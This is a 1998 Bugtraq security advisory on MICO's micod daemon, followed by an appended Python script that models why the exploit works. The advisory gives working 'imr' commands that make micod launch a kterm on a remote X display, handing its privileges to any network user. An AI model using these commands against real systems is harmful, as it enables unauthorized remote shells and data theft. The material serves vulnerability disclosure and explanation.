Bugtraq: MICO: security problem: Privileges of micod for everybody!

From: Dominique Unruh <dominique_at_UNRUH.DE>
Date: Sun, 10 May 1998 12:30:01 +0200

After installing MICO (a free CORBA ORB for C++) I installed 'micod' (a
daemon which is, e.g., able to create objects on request).
I put it in my boot-up scripts, so it ran as root, but this exploit will
also work if it is started as another user.

After thinking for a moment I tried this (as guest, but it could be a user
on another system too):

(micod is started on inet:winkelklinke.local:8888)
(attacking from enfin.local, which has X on display :0)

imr -ORBImplRepoAddr inet:winkelklinke.local:8888 create Play shared \
    "kterm -display enfin.local:0 & echo" IDL:Anything:1.0
imr -ORBImplRepoAddr inet:winkelklinke.local:8888 activate Play

kterm will start as a child of micod and connect to enfin.local:0.
(Any other program should work too, but xterm didn't start correctly; I
don't know why.)
The 'echo' after the '&' is needed to absorb the arguments micod adds to
the command line.

Now you can do everything.

Don't underestimate the problem if micod is not installed as root:
1. You can log in; it's as good as a password-free guest account.

2. You may control other servers started by micod or see their
process memory (e.g. under Linux with /proc, but there may be other ways
on other systems), which may contain sensitive data such as access passwords,
credit card information or whatever, depending on your application.

I think there should be some kind of access limitation on writing to
the Implementation Repository (the information managed by micod).
And there should be a visible warning in the documentation.

DniQ.

PS: Hello Nahne!
Received on May 10 1998
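The argument-absorption trick the post relies on (micod appends its own arguments to the registered command line, so a trailing '& echo' keeps them away from kterm) can be checked without a MICO installation. The following Python script is an added example, not code from the post or from MICO: it models the daemon as "/bin/sh -c" with a placeholder set of appended options (the post only says micod adds arguments; the exact options are not given, so the ones below are assumed), and it uses a small probe program in place of kterm that records how many arguments it actually received.

```python
"""Model of how an activation daemon such as micod turns a registered command
string into a process, and why the trailing '& echo' from the post matters.

Added example, not MICO's code.  Assumptions: the daemon hands the registered
string to /bin/sh -c with its own options appended, and the options appended
below are placeholders (the post only says micod "adds" arguments)."""
import os
import shlex
import subprocess
import sys
import tempfile

# Placeholder for whatever micod appends to the command line (assumption).
DAEMON_APPENDED_ARGS = ["-ORBImplRepoAddr", "inet:winkelklinke.local:8888"]

# Stand-in for the program the attacker registers (kterm in the post): it
# writes the number of arguments it actually received to the file $PROBE_OUT.
PROBE = shlex.quote(sys.executable) + ' -c "' + (
    "import os, sys, pathlib; "
    "pathlib.Path(os.environ['PROBE_OUT']).write_text(str(len(sys.argv) - 1))"
) + '"'


def activate_like_daemon(registered_cmd, appended_args=DAEMON_APPENDED_ARGS):
    """Spawn the registered command the way the post describes micod doing it:
    one shell command line, with the daemon's own arguments tacked on the end.
    Returns the number of arguments the registered program saw."""
    with tempfile.TemporaryDirectory() as tmp:
        out = os.path.join(tmp, "argc")
        env = dict(os.environ, PROBE_OUT=out)
        # "; wait" only makes the model deterministic when the registered
        # command was backgrounded with '&'; it changes nothing the program
        # receives.
        cmdline = registered_cmd + " " + " ".join(appended_args) + "; wait"
        subprocess.run(["/bin/sh", "-c", cmdline], env=env, check=True,
                       stdout=subprocess.DEVNULL)
        with open(out) as f:
            return int(f.read())


def args_seen_without_absorber():
    """Register the probe bare: the daemon's options land on the program,
    which for kterm would mean unknown options on its command line."""
    return activate_like_daemon(PROBE)


def args_seen_with_absorber():
    """Register the probe as in the post, with '& echo' appended: the program
    is backgrounded with no extra arguments and echo swallows the daemon's."""
    return activate_like_daemon(PROBE + " & echo")


if __name__ == "__main__":
    print("arguments seen without '& echo':", args_seen_without_absorber())
    print("arguments seen with    '& echo':", args_seen_with_absorber())
```

Run as a script, the first call reports the number of placeholder options (2 here) and the second reports 0; that difference is exactly what the post's trailing '& echo' buys the attacker. The model also makes the underlying problem visible: the fact that '& echo' works at all means the registered string is parsed by a shell, so anyone who can write to the Implementation Repository is choosing an arbitrary command line for micod's uid, not merely a program path.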
